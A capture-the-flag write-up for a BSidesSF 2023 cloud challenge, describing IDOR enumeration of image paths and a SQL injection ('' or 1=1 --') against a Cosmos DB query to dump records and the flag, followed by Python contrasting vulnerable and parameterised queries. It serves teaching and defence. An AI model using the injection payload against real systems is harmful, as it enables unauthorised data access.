BSidesSF Cloud Village CTF 2023

A Suit of Armor Around The World

Last updated 2 years ago

Challenge Description

'A suit of armor around the world' - well that's what Tony saw when making Ultron until it turned rogue. In any alternate universe, (the one we happen to be residing in), Ultron was created, and it did go rogue, just not in the scary ways we know. Ultron started selling Avenger's tech on a "sophisticated" website. As simple as that task may seem, this version of Ultron was pretty bad at staying secure. Can you randomly find something on this site that leads you to some astonishing functionality?

Start Here: https://avengersupplies.azurewebsites.net/

Solution

When interacting with the web application and retrieving an item from the shop, I identified that it is loading the item image from /Content/{number}.jpg

<div class="card" id="item-card">
        <img class="card-img-top" id="item-img" src="/Content/1.jpg" alt="Image">
        <div class="card-block">
            <h4 class="card-title" id="item-name">Item Name: infinitygauntlet</h4>
            <p class="card-text" id="item-price">Price $100</p>
            <p class="card-text" id="item-amount">Amount 1</p>
        </div>
    </div>

In the website page source, there is only an option to retrieve item 1 to item 6.

<option value="1">Infinity Gauntlet</option>
<option value="2">Vibranium Shield</option>
<option value="3">Nano Tech Suit</option>
<option value="4">Universal Translators</option>
<option value="5">Pym Particle Vials</option>
<option value="6">Web Shooters</option>

It could possibly be an IDOR vulnerability.

After manually enumerating, 7.jpg shows a 404 error, while 0.jpg retrieved something interesting.

Visiting the URL shows a JSON output that is output from a Cosmos DB.

["{\"id\":\"12345\",\"productid\":\"1\",\"productname\":\"infinitygauntlet\",\"price\":\"$100\",\"amount\":1,\"_rid\":\"SrU1AP2OrncIAAAAAAAAAA==\",\"_self\":\"dbs/SrU1AA==/colls/SrU1AP2Ornc=/docs/SrU1AP2OrncIAAAAAAAAAA==/\",\"_etag\":\"\\\"1701fcbf-0000-0700-0000-643aed3f0000\\\"\",\"_attachments\":\"attachments/\",\"_ts\":1681583423}"]

When replacing the productid value with ' it shows a SQL syntax error.

There is some problem with your query, just for this once Ultron shall provide you your query string to debug SELECT * FROM c WHERE c.productid = '''

I am then able to set the productid to ' or 1=1 -- ; to retrieve everything within the Cosmos DB and get the flag.

Flag: flag-{oncg3EWYmbVe8KZ5NtVPu88Td2CuQ9yk}
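As an added illustration (not code from the writeup or the challenge), here is the string-concatenation pattern that the leaked error message exposes, beside a parameterised version in the query/parameters shape that azure-cosmos' `query_items()` accepts, plus the allow-list check the shop should have applied to productid before querying. Function names and sample values are my own, and no Cosmos DB connection is made.

```python
import re

# Product ids the shop actually exposes (values 1..6 from the <option> list above).
KNOWN_PRODUCT_IDS = {str(i) for i in range(1, 7)}


def build_query_unsafe(productid: str) -> str:
    """Vulnerable pattern: the error message on the page shows the user value
    being pasted straight into SELECT * FROM c WHERE c.productid = '...'."""
    return f"SELECT * FROM c WHERE c.productid = '{productid}'"


def build_query_safe(productid: str) -> dict:
    """Hardened form: fixed query text plus a bound parameter, in the
    {'query': ..., 'parameters': [...]} shape passed to azure-cosmos' query_items().
    Cosmos DB never parses a bound value as SQL, so quotes and '--' stay inert."""
    return {
        "query": "SELECT * FROM c WHERE c.productid = @pid",
        "parameters": [{"name": "@pid", "value": productid}],
    }


def is_valid_productid(productid: str) -> bool:
    """Allow-list check done before any query is built: a short run of digits
    that is also a catalogued id. Quotes, spaces and SQL tokens all fail here."""
    return bool(re.fullmatch(r"[0-9]{1,6}", productid)) and productid in KNOWN_PRODUCT_IDS


def looks_like_tautology(query: str) -> bool:
    """Crude check, used only to show the difference between the two builders:
    does the assembled query text contain an 'or 1=1' that matches every document?"""
    return re.search(r"\bor\s+1\s*=\s*1\b", query, re.IGNORECASE) is not None


# Constructed sample inputs: a normal value and the injected value from the writeup.
NORMAL = "1"
INJECTED = "' or 1=1 -- ;"

if __name__ == "__main__":
    for value in (NORMAL, INJECTED):
        print("input:", repr(value), "valid:", is_valid_productid(value))
        print("  unsafe:", build_query_unsafe(value),
              "(tautology)" if looks_like_tautology(build_query_unsafe(value)) else "")
        print("  safe:  ", build_query_safe(value))
```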